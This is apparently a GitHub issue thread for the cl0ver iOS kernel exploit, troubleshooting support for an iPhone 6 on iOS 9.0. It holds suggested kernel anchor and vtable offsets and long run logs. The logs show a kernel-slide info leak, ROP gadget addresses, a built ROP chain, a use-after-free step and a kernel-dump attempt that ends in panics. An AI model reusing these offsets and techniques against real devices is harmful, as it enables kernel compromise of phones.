Siguza/cl0ver

Unsupported device: iPhone 6 (N61AP) / iOS 9.0 (13A344)

amourification opened this issue · 14 comments

Isn't there any possibility for supporting iPhone 6 (N61AP) on iOS 9.0 with Pangu Jailbreak?

There certainly is, but it's a bit of a stab in the dark. Try this:

  1. Create /etc/cl0ver/config.txt with the following contents:

     0xffffff800454a000
     0xffffff8004503168
    
  2. Download this file, unzip it and place it in /etc/cl0ver/offsets.dat.

  3. Run ./cl0ver and see whether you get an error or a crash.

The iPhone crashed >.<
Now what? :D

This is exactly what I get when I SSH ./cl0ver
The iPhone crashes at the last line

amouriPhone:~ root# ./cl0ver
[] Checking for config file... [src/lib/offsets.c:172 off_cfg]
[
] Yes, attempting to read anchor and vtab from config file... [src/lib/offsets.c:182 off_cfg]
[] Anchor: 0xffffff800454a000, Vtab (unslid): 0xffffff8004503168 [src/lib/offsets.c:186 off_cfg]
[
] Using info leak to get kernel slide... [src/lib/slide.c:64 get_kernel_slide]
[] Dict: [src/lib/slide.c:33 get_kernel_anchor]
[
] dict[0]: 0x000000d3 [src/lib/slide.c:33 get_kernel_anchor]
[] dict[1]: 0x81000002 [src/lib/slide.c:33 get_kernel_anchor]
[
] dict[2]: 0x08000004 [src/lib/slide.c:33 get_kernel_anchor]
[] dict[3]: 0x006c6f6c [src/lib/slide.c:33 get_kernel_anchor]
[
] dict[4]: 0x84000400 [src/lib/slide.c:33 get_kernel_anchor]
[] dict[5]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
[
] dict[6]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
[] Spawning user client / Parsing dictionary... [src/lib/io.c:59 _io_spawn_client]
[
] Getting IO service handle... [src/lib/io.c:45 _io_get_service]
[] Getting IO master port... [src/lib/io.c:30 get_io_master_port]
[
] Creating dict iterator... [src/lib/io.c:72 _io_iterator]
[] Getting next element from iterator... [src/lib/io.c:84 _io_next]
[
] Releasing user client... [src/lib/io.c:131 _io_release_client]
[] Kernel stack: [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 0]: 0x6969696969696969 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 1]: 0xffffff8016d4a000 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 2]: 0x00000000ff002bf1 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 3]: 0xffffff81187195cc [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 4]: 0xffffff811a89bab4 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 5]: 0xffffff8119eb8800 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 6]: 0xffffff81187195a0 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 7]: 0xffffff800ddeb950 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 8]: 0xffffff80168d4edc [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 9]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[10]: 0xffffff8016d50a50 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[11]: 0xffffff8118719000 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[12]: 0xffffff8016d9ecc8 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[13]: 0x0000000000001074 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[14]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[15]: 0xffffff8016d9e050 [src/lib/slide.c:44 get_kernel_anchor]
[
] Kernel slide: 0x0000000012800000 [src/lib/slide.c:67 get_kernel_slide]
[] OS build: 13A344 [src/lib/device.c:102 get_os_version_internal]
[
] Page size: 0x0000000000001000 [src/lib/uaf_rop.c:113 uaf_rop_stack]
[] Allocating ROP stack page at 0x000000000c000000 [src/lib/uaf_rop.c:117 uaf_rop_stack]
[
] Allocated ROP page at 0x000000000c000000 [src/lib/uaf_rop.c:123 uaf_rop_stack]
[] Initializing offsets... [src/lib/offsets.c:248 off_init]
[
] Checking for offsets cache file... [src/lib/offsets.c:261 off_init]
[] Yes, trying to load offsets from cache... [src/lib/offsets.c:267 off_init]
[
] Successfully loaded offsets from cache, skipping kernel dumping. [src/lib/offsets.c:284 off_init]
[] Offsets: [src/lib/offsets.c:430 off_init]
[
] gadget_load_x20_x19 = 0xffffff8016808dec [src/lib/offsets.c:431 off_init]
[] gadget_ldp_x9_add_sp_sp_0x10 = 0xffffff801807cdbc [src/lib/offsets.c:432 off_init]
[
] gadget_ldr_x0_sp_0x20_load_x22_x19 = 0xffffff80168e3880 [src/lib/offsets.c:433 off_init]
[] gadget_add_x0_x0_x19_load_x20_x19 = 0xffffff80168dd618 [src/lib/offsets.c:434 off_init]
[
] gadget_blr_x20_load_x22_x19 = 0xffffff80175bebc8 [src/lib/offsets.c:435 off_init]
[] gadget_str_x0_x19_load_x20_x19 = 0xffffff8016829ec0 [src/lib/offsets.c:436 off_init]
[
] gadget_ldr_x0_x21_load_x24_x19 = 0xffffff8016b027b0 [src/lib/offsets.c:437 off_init]
[] gadget_OSUnserializeXML_return = 0xffffff8016bf69ec [src/lib/offsets.c:438 off_init]
[
] frag_mov_x1_x20_blr_x19 = 0xffffff801682c128 [src/lib/offsets.c:439 off_init]
[] func_ldr_x0_x0 = 0xffffff8016919810 [src/lib/offsets.c:440 off_init]
[
] func_current_task = 0xffffff8016851b4c [src/lib/offsets.c:441 off_init]
[] func_ipc_port_copyout_send = 0xffffff801681e728 [src/lib/offsets.c:442 off_init]
[
] func_ipc_port_make_send = 0xffffff801681e67c [src/lib/offsets.c:443 off_init]
[] data_kernel_task = 0xffffff8016d4a010 [src/lib/offsets.c:444 off_init]
[
] data_realhost_special = 0xffffff8016da83f0 [src/lib/offsets.c:445 off_init]
[] off_task_itk_self = 0x00000000000000e8 [src/lib/offsets.c:446 off_init]
[
] off_task_itk_space = 0x00000000000002a0 [src/lib/offsets.c:447 off_init]
[] OSUnserializeXML_stack = 0x0000000000000110 [src/lib/offsets.c:448 off_init]
[
] is_io_service_open_extended_stack = 0x0000000000000120 [src/lib/offsets.c:449 off_init]
[] Rop chain: 0x000000000c000000-0x000000000c000340 [src/lib/exploit.c:73 get_kernel_task]
[
] fp: 0x000000000c000010 [src/lib/exploit.c:76 get_kernel_task]
[] lr: 0xffffff801807cdbc [src/lib/exploit.c:77 get_kernel_task]
[
] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[] fp: 0x000000000c000020 [src/lib/exploit.c:76 get_kernel_task]
[
] lr: 0xffffff801807cdbc [src/lib/exploit.c:77 get_kernel_task]
[] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[
] fp: 0x000000000c000030 [src/lib/exploit.c:76 get_kernel_task]
[] lr: 0xffffff801807cdbc [src/lib/exploit.c:77 get_kernel_task]
[
] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[] fp: 0x000000000c000040 [src/lib/exploit.c:76 get_kernel_task]
[
] lr: 0xffffff801807cdbc [src/lib/exploit.c:77 get_kernel_task]
[] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[
] fp: 0x000000000c000050 [src/lib/exploit.c:76 get_kernel_task]
[] lr: 0xffffff801807cdbc [src/lib/exploit.c:77 get_kernel_task]
[
] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[] fp: 0x000000000c000060 [src/lib/exploit.c:76 get_kernel_task]
[
] lr: 0xffffff801807cdbc [src/lib/exploit.c:77 get_kernel_task]
[] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[
] fp: 0x000000000c000070 [src/lib/exploit.c:76 get_kernel_task]
[] lr: 0xffffff801807cdbc [src/lib/exploit.c:77 get_kernel_task]
[
] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[] fp: 0x000000000c000080 [src/lib/exploit.c:76 get_kernel_task]
[
] lr: 0xffffff801807cdbc [src/lib/exploit.c:77 get_kernel_task]
[] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[
] fp: 0x000000000c000090 [src/lib/exploit.c:76 get_kernel_task]
[] lr: 0xffffff801807cdbc [src/lib/exploit.c:77 get_kernel_task]
[
] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[] fp: 0x000000000c0000a0 [src/lib/exploit.c:76 get_kernel_task]
[
] lr: 0xffffff801807cdbc [src/lib/exploit.c:77 get_kernel_task]
[] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[
] fp: 0x000000000c0000b0 [src/lib/exploit.c:76 get_kernel_task]
[] lr: 0xffffff801807cdbc [src/lib/exploit.c:77 get_kernel_task]
[
] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[] fp: 0x000000000c0000c0 [src/lib/exploit.c:76 get_kernel_task]
[
] lr: 0xffffff801807cdbc [src/lib/exploit.c:77 get_kernel_task]
[] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[
] fp: 0x000000000c0000d0 [src/lib/exploit.c:76 get_kernel_task]
[] lr: 0xffffff801807cdbc [src/lib/exploit.c:77 get_kernel_task]
[
] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[] fp: 0x000000000c000100 [src/lib/exploit.c:76 get_kernel_task]
[
] lr: 0xffffff80168e3880 [src/lib/exploit.c:77 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] 0xfffffffffffffee0 [src/lib/exploit.c:84 get_kernel_task]
[] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[
] fp: 0x000000000c000120 [src/lib/exploit.c:76 get_kernel_task]
[] lr: 0xffffff80168dd618 [src/lib/exploit.c:77 get_kernel_task]
[
] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[] 0x000000000c000330 [src/lib/exploit.c:84 get_kernel_task]
[
] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[] fp: 0x000000000c000140 [src/lib/exploit.c:76 get_kernel_task]
[
] lr: 0xffffff8016829ec0 [src/lib/exploit.c:77 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[
] fp: 0x000000000c000160 [src/lib/exploit.c:76 get_kernel_task]
[] lr: 0xffffff8016808dec [src/lib/exploit.c:77 get_kernel_task]
[
] 0xffffff8016851b4c [src/lib/exploit.c:84 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[] fp: 0x000000000c000190 [src/lib/exploit.c:76 get_kernel_task]
[
] lr: 0xffffff80175bebc8 [src/lib/exploit.c:77 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] 0x00000000000002a0 [src/lib/exploit.c:84 get_kernel_task]
[] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[
] fp: 0x000000000c0001b0 [src/lib/exploit.c:76 get_kernel_task]
[] lr: 0xffffff80168dd618 [src/lib/exploit.c:77 get_kernel_task]
[
] 0xffffff8016919810 [src/lib/exploit.c:84 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[] fp: 0x000000000c0001e0 [src/lib/exploit.c:76 get_kernel_task]
[
] lr: 0xffffff80175bebc8 [src/lib/exploit.c:77 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] 0xffffff8016d4a010 [src/lib/exploit.c:84 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] 0x000000000c0002b0 [src/lib/exploit.c:84 get_kernel_task]
[] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[
] fp: 0x000000000c000200 [src/lib/exploit.c:76 get_kernel_task]
[] lr: 0xffffff8016829ec0 [src/lib/exploit.c:77 get_kernel_task]
[
] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[] fp: 0x000000000c000240 [src/lib/exploit.c:76 get_kernel_task]
[
] lr: 0xffffff8016b027b0 [src/lib/exploit.c:77 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] 0x00000000000000e8 [src/lib/exploit.c:84 get_kernel_task]
[] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[
] fp: 0x000000000c000260 [src/lib/exploit.c:76 get_kernel_task]
[] lr: 0xffffff80168dd618 [src/lib/exploit.c:77 get_kernel_task]
[
] 0xffffff8016919810 [src/lib/exploit.c:84 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[] fp: 0x000000000c000290 [src/lib/exploit.c:76 get_kernel_task]
[
] lr: 0xffffff80175bebc8 [src/lib/exploit.c:77 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[] 0xffffff801681e67c [src/lib/exploit.c:84 get_kernel_task]
[
] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[
] fp: 0x000000000c0002c0 [src/lib/exploit.c:76 get_kernel_task]
[] lr: 0xffffff80175bebc8 [src/lib/exploit.c:77 get_kernel_task]
[
] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] 0x00000000baadf00d [src/lib/exploit.c:84 get_kernel_task]
[] 0xffffff8016808dec [src/lib/exploit.c:84 get_kernel_task]
[
] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[] fp: 0x000000000c0002e0 [src/lib/exploit.c:76 get_kernel_task]
[
] lr: 0xffffff801682c128 [src/lib/exploit.c:77 get_kernel_task]
[] 0xffffff801681e728 [src/lib/exploit.c:84 get_kernel_task]
[
] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[
] fp: 0x000000000c000310 [src/lib/exploit.c:76 get_kernel_task]
[] lr: 0xffffff80175bebc8 [src/lib/exploit.c:77 get_kernel_task]
[
] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[] 0x00000001000d04e8 [src/lib/exploit.c:84 get_kernel_task]
[
] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[] fp: 0x000000000c000330 [src/lib/exploit.c:76 get_kernel_task]
[
] lr: 0xffffff8016829ec0 [src/lib/exploit.c:77 get_kernel_task]
[] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[
] 0x0000000000000000 [src/lib/exploit.c:84 get_kernel_task]
[] ---------------------- [src/lib/exploit.c:87 get_kernel_task]
[
] fp: 0x00000000deadbeef [src/lib/exploit.c:76 get_kernel_task]
[] lr: 0xffffff8016bf69ec [src/lib/exploit.c:77 get_kernel_task]
[
] Executing ROP chain... [src/lib/uaf_rop.c:131 uaf_rop]
[] Using UAF to gain PC control... [src/lib/uaf_rop.c:19 uaf_parse]
[
] Data: [src/lib/uaf_rop.c:22 uaf_parse]
[] data[0]: 0x6fd474c0 [src/lib/uaf_rop.c:22 uaf_parse]
[
] data[1]: 0x00000001 [src/lib/uaf_rop.c:22 uaf_parse]
[] data[2]: 0x00000064 [src/lib/uaf_rop.c:22 uaf_parse]
[
] data[3]: 0x00000001 [src/lib/uaf_rop.c:22 uaf_parse]
[] data[4]: 0x00000000 [src/lib/uaf_rop.c:22 uaf_parse]
[
] data[5]: 0x00000001 [src/lib/uaf_rop.c:22 uaf_parse]
[] data[6]: 0x00000000 [src/lib/uaf_rop.c:22 uaf_parse]
[
] data[7]: 0x00000000 [src/lib/uaf_rop.c:22 uaf_parse]
[] dict_90: [src/lib/uaf_rop.c:99 uaf_parse]
[
] dict_90[ 0]: 0x000000d3 [src/lib/uaf_rop.c:99 uaf_parse]
[] dict_90[ 1]: 0x81000004 [src/lib/uaf_rop.c:99 uaf_parse]
[
] dict_90[ 2]: 0x08000004 [src/lib/uaf_rop.c:99 uaf_parse]
[] dict_90[ 3]: 0x00727473 [src/lib/uaf_rop.c:99 uaf_parse]
[
] dict_90[ 4]: 0x09000004 [src/lib/uaf_rop.c:99 uaf_parse]
[] dict_90[ 5]: 0x00727473 [src/lib/uaf_rop.c:99 uaf_parse]
[
] dict_90[ 6]: 0x0c000001

This is the result of ./cl0ver slide

amouriPhone:~ root# ./cl0ver slide
[] Checking for config file... [src/lib/offsets.c:172 off_cfg]
[
] Yes, attempting to read anchor and vtab from config file... [src/lib/offsets.c:182 off_cfg]
[] Anchor: 0xffffff800454a000, Vtab (unslid): 0xffffff8004503168 [src/lib/offsets.c:186 off_cfg]
[
] Using info leak to get kernel slide... [src/lib/slide.c:64 get_kernel_slide]
[] Dict: [src/lib/slide.c:33 get_kernel_anchor]
[
] dict[0]: 0x000000d3 [src/lib/slide.c:33 get_kernel_anchor]
[] dict[1]: 0x81000002 [src/lib/slide.c:33 get_kernel_anchor]
[
] dict[2]: 0x08000004 [src/lib/slide.c:33 get_kernel_anchor]
[] dict[3]: 0x006c6f6c [src/lib/slide.c:33 get_kernel_anchor]
[
] dict[4]: 0x84000400 [src/lib/slide.c:33 get_kernel_anchor]
[] dict[5]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
[
] dict[6]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
[] Spawning user client / Parsing dictionary... [src/lib/io.c:59 _io_spawn_client]
[
] Getting IO service handle... [src/lib/io.c:45 _io_get_service]
[] Getting IO master port... [src/lib/io.c:30 get_io_master_port]
[
] Creating dict iterator... [src/lib/io.c:72 _io_iterator]
[] Getting next element from iterator... [src/lib/io.c:84 _io_next]
[
] Releasing user client... [src/lib/io.c:131 _io_release_client]
[] Kernel stack: [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 0]: 0x6969696969696969 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 1]: 0xffffff8016d4a000 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 2]: 0x00000000ff002bf1 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 3]: 0xffffff81187195cc [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 4]: 0xffffff8118b4d2b4 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 5]: 0xffffff811c10b500 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 6]: 0xffffff81187195a0 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 7]: 0xffffff8009143950 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 8]: 0xffffff80168d4edc [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 9]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[10]: 0xffffff8016d50a50 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[11]: 0xffffff8118719000 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[12]: 0xffffff8016d9ecc8 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[13]: 0x0000000000001074 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[14]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[15]: 0xffffff8016d9e050 [src/lib/slide.c:44 get_kernel_anchor]
[
] Kernel slide: 0x0000000012800000 [src/lib/slide.c:67 get_kernel_slide]
[*] OS build: 13A344 [src/lib/device.c:102 get_os_version_internal]

Here is the crash report of an earlier ./cl0ver panic attempt:
https://pastebin.com/e7ykVvNq

Try ./cl0ver dump.

It crashes the iPhone as well and no file is dumped anywhere

How soon does it crash? Do you ever get to see Dumping kernel bytes 0x...-0x..., or does it crash before that?

Yeah, Dumping kernel bytes appears then iPhone crashes right after.

amouriPhone:/private/var/root root# ./cl0ver dump
[] Checking for config file... [src/lib/offsets.c:172 off_cfg]
[
] Yes, attempting to read anchor and vtab from config file... [src/lib/offsets.c:182 off_cfg]
[] Anchor: 0xffffff800454a000, Vtab (unslid): 0xffffff8004503168 [src/lib/offsets.c:186 off_cfg]
[
] Using info leak to get kernel slide... [src/lib/slide.c:64 get_kernel_slide]
[] Dict: [src/lib/slide.c:33 get_kernel_anchor]
[
] dict[0]: 0x000000d3 [src/lib/slide.c:33 get_kernel_anchor]
[] dict[1]: 0x81000002 [src/lib/slide.c:33 get_kernel_anchor]
[
] dict[2]: 0x08000004 [src/lib/slide.c:33 get_kernel_anchor]
[] dict[3]: 0x006c6f6c [src/lib/slide.c:33 get_kernel_anchor]
[
] dict[4]: 0x84000400 [src/lib/slide.c:33 get_kernel_anchor]
[] dict[5]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
[
] dict[6]: 0x69696969 [src/lib/slide.c:33 get_kernel_anchor]
[] Spawning user client / Parsing dictionary... [src/lib/io.c:59 _io_spawn_client]
[
] Getting IO service handle... [src/lib/io.c:45 _io_get_service]
[] Getting IO master port... [src/lib/io.c:30 get_io_master_port]
[
] Creating dict iterator... [src/lib/io.c:72 _io_iterator]
[] Getting next element from iterator... [src/lib/io.c:84 _io_next]
[
] Releasing user client... [src/lib/io.c:131 _io_release_client]
[] Kernel stack: [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 0]: 0x6969696969696969 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 1]: 0xffffff801094a000 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 2]: 0x00000000ff002bf1 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 3]: 0xffffff8112ee05cc [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 4]: 0xffffff81131626b4 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 5]: 0xffffff81149dd300 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 6]: 0xffffff8112ee05a0 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 7]: 0xffffff8169643950 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[ 8]: 0xffffff80104d4edc [src/lib/slide.c:44 get_kernel_anchor]
[] buf[ 9]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[10]: 0xffffff8010950a50 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[11]: 0xffffff8112ee0000 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[12]: 0xffffff801099ecc8 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[13]: 0x0000000000001074 [src/lib/slide.c:44 get_kernel_anchor]
[
] buf[14]: 0x0000000000000000 [src/lib/slide.c:44 get_kernel_anchor]
[] buf[15]: 0xffffff801099e050 [src/lib/slide.c:44 get_kernel_anchor]
[
] Kernel slide: 0x000000000c400000 [src/lib/slide.c:67 get_kernel_slide]
[] OS build: 13A344 [src/lib/device.c:102 get_os_version_internal]
[
] Dumping kernel to file [src/lib/exploit.c:40 dump_kernel]
[] Dumping kernel, this will take some time... [src/lib/uaf_read.c:442 uaf_dump_kernel]
[
] Dumping kernel bytes 0xffffff8010404000-0xffffff8010405000... [src/lib/uaf_read.c:288 uaf_read]
[] Dumping 0xffffff8010404000-0xffffff8010405000... [src/lib/uaf_read.c:334 uaf_read]
[
] Kernel segments: [src/lib/uaf_read.c:467 uaf_dump_kernel]
[] Mem: 0xffffff8010404000-0xffffff80108f4000 File: 0x0000000000000000-0x00000000004f0000 __TEXT [src/lib/uaf_read.c:496 uaf_dump_kernel]
[
] Mem: 0xffffff8010407000-0xffffff801089152c File: 0x0000000000003000-0x000000000048d52c __TEXT.__text [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8010891540-0xffffff80108b74cc File: 0x000000000048d540-0x00000000004b34cc __TEXT.__const [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff80108b74cc-0xffffff80108f3da5 File: 0x00000000004b34cc-0x00000000004efda5 __TEXT.__cstring [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff80108f4000-0xffffff80109b8000 File: 0x00000000004f0000-0x0000000000548000 __DATA [src/lib/uaf_read.c:496 uaf_dump_kernel]
[
] Mem: 0xffffff80108f4000-0xffffff80108f4208 File: 0x00000000004f0000-0x00000000004f0208 __DATA.__mod_init_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff80108f4208-0xffffff80108f4408 File: 0x00000000004f0208-0x00000000004f0408 __DATA.__mod_term_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff80108f8000-0xffffff8010915f88 File: 0x00000000004f4000-0x0000000000511f88 __DATA.__const [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8010918000-0xffffff8010948018 File: 0x0000000000514000-0x0000000000544018 __DATA.__data [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff8010948018-0xffffff8010949e40 File: 0x0000000000544018-0x0000000000545e40 __DATA.__sysctl_set [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8010949e40-0xffffff8010949e40 File: 0x0000000000545e40-0x0000000000545e40 __DATA.__llvm_prf_cnts [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff8010949e40-0xffffff8010949e40 File: 0x0000000000545e40-0x0000000000545e40 __DATA.__llvm_prf_data [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8010949e40-0xffffff8010949e40 File: 0x0000000000545e40-0x0000000000545e40 __DATA.__llvm_prf_names__DATA [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff801094a000-0xffffff801094b100 File: 0x0000000000000000-0x0000000000001100 __DATA.__common [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff801094c000-0xffffff80109b4eb8 File: 0x0000000000000000-0x0000000000068eb8 __DATA.__bss [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff80109b8000-0xffffff80109bc000 File: 0x0000000000548000-0x000000000054c000 __KLD (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[] Mem: 0xffffff80109b8000-0xffffff80109b9258 File: 0x0000000000548000-0x0000000000549258 __KLD.__text [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff80109b9258-0xffffff80109b9960 File: 0x0000000000549258-0x0000000000549960 __KLD.__cstring [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff80109b9960-0xffffff80109b99c8 File: 0x0000000000549960-0x00000000005499c8 __KLD.__const [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff80109b99c8-0xffffff80109b99d0 File: 0x00000000005499c8-0x00000000005499d0 __KLD.__mod_init_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff80109b99d0-0xffffff80109b99d8 File: 0x00000000005499d0-0x00000000005499d8 __KLD.__mod_term_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff80109b99d8-0xffffff80109b99d9 File: 0x0000000000000000-0x0000000000000001 __KLD.__bss [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff80109bc000-0xffffff80109c0000 File: 0x000000000054c000-0x0000000000550000 __LAST (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[
] Mem: 0xffffff80109bc000-0xffffff80109bc008 File: 0x000000000054c000-0x000000000054c008 __LAST.__mod_init_func [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff80109bc008-0xffffff80109bc008 File: 0x0000000000000000-0x0000000000000000 __LAST.__last [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff8010a1c000-0xffffff8011edc000 File: 0x00000000005ac000-0x0000000001a6c000 __PRELINK_TEXT [src/lib/uaf_read.c:496 uaf_dump_kernel]
[] Mem: 0xffffff8010a1c000-0xffffff8011edc000 File: 0x00000000005ac000-0x0000000001a6c000 __PRELINK_TEXT.__text [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff80109c0000-0xffffff80109c0000 File: 0x0000000000550000-0x0000000000550000 __PRELINK_STATE (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[] Mem: 0xffffff80109c0000-0xffffff80109c0000 File: 0x0000000000550000-0x0000000000550000 __PRELINK_STATE.__kernel [src/lib/uaf_read.c:500 uaf_dump_kernel]
[
] Mem: 0xffffff80109c0000-0xffffff80109c0000 File: 0x0000000000550000-0x0000000000550000 __PRELINK_STATE.__kexts [src/lib/uaf_read.c:500 uaf_dump_kernel]
[] Mem: 0xffffff8011edc000-0xffffff8011f84000 File: 0x0000000001a6c000-0x0000000001b12d8a __PRELINK_INFO (skipped) [src/lib/uaf_read.c:496 uaf_dump_kernel]
[
